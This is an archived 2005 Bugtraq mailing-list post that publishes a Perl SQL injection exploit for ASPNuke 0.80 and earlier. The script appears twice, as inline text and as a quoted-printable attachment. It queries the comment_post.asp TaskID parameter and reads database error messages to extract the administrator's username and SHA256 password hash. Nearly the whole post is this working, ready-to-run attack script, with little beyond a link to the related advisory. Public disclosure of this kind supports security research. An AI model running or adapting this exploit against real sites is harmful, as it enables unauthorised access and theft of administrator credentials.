[39326] in bugtraq
SQL Injection Exploit for ASPNuke <= 0.80
daemon@ATHENA.MIT.EDU (Alberto Trivero)
Tue Jun 28 16:53:00 2005
Message-ID: <006e01c57b3c$2cde0850$0100a8c0@alberto>
From: "Alberto Trivero" <trivero@jumpy.it>
To: <vuln@frsirt.com>, <submit@milw0rm.com>,
<submissions@packetstormsecurity.org>, <news@securiteam.com>,
<bugtraq@securityfocus.com>
Date: Mon, 27 Jun 2005 19:17:58 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_006B_01C57B4C.EDC8FBF0"
This is a multi-part message in MIME format.
------=_NextPart_000_006B_01C57B4C.EDC8FBF0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
#!/usr/bin/perl -w
#
# SQL Injection Exploit for ASPNuke <= 0.80
# This exploit retrieve the username of the administrator of the board and
his password crypted in SHA256
# Related advisory:
http://www.securityfocus.com/archive/1/403479/30/0/threaded
# Discovered and Coded by Alberto Trivero
use LWP::Simple;
print "\n\t===============================\n";
print "\t= Exploit for ASPNuke <= 0.80 =\n";
print "\t= by Alberto Trivero =\n";
print "\t===============================\n\n";
if(@ARGV!=1 or !($ARGV[0]=~m/http/)) {
print "Usage:\nperl $0 [full_target_path]\n\nExamples:\nperl $0
http://www.example.com/aspnuke/\n";
exit(0);
}
$page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Username")
|| die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/the varchar value '(.*?)' to a column/ && print "[+] Username of
admin is: $1\n";
print "[-] Unable to retrieve Username\n" if(!$1);
$page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Password")
|| die "[-] Unable to retrieve: $!";
$page=~m/the varchar value '(.*?)' to a column/ && print "[+] SHA256 hash of
password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
------=_NextPart_000_006B_01C57B4C.EDC8FBF0
Content-Type: application/octet-stream;
name="aspnuke.pl"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="aspnuke.pl"
#!/usr/bin/perl -w
#
# SQL Injection Exploit for ASPNuke <=3D 0.80
# This exploit retrieve the username of the administrator of the board =
and his password crypted in SHA256
# Related advisory: =
http://www.securityfocus.com/archive/1/403479/30/0/threaded
# Discovered and Coded by Alberto Trivero
use LWP::Simple;
print =
"\n\t=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D\n";
print "\t=3D Exploit for ASPNuke <=3D 0.80 =3D\n";
print "\t=3D by Alberto Trivero =3D\n";
print =
"\t=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D\n\n";
if(@ARGV!=3D1 or !($ARGV[0]=3D~m/http/)) {
print "Usage:\nperl $0 [full_target_path]\n\nExamples:\nperl $0 =
http://www.example.com/aspnuke/\n";
exit(0);
}
$page=3Dget($ARGV[0]."module/support/task/comment_post.asp?TaskID=3DUsern=
ame") || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=3D~m/the varchar value '(.*?)' to a column/ && print "[+] Username =
of admin is: $1\n";
print "[-] Unable to retrieve Username\n" if(!$1);
$page=3Dget($ARGV[0]."module/support/task/comment_post.asp?TaskID=3DPassw=
ord") || die "[-] Unable to retrieve: $!";
$page=3D~m/the varchar value '(.*?)' to a column/ && print "[+] SHA256 =
hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
------=_NextPart_000_006B_01C57B4C.EDC8FBF0--
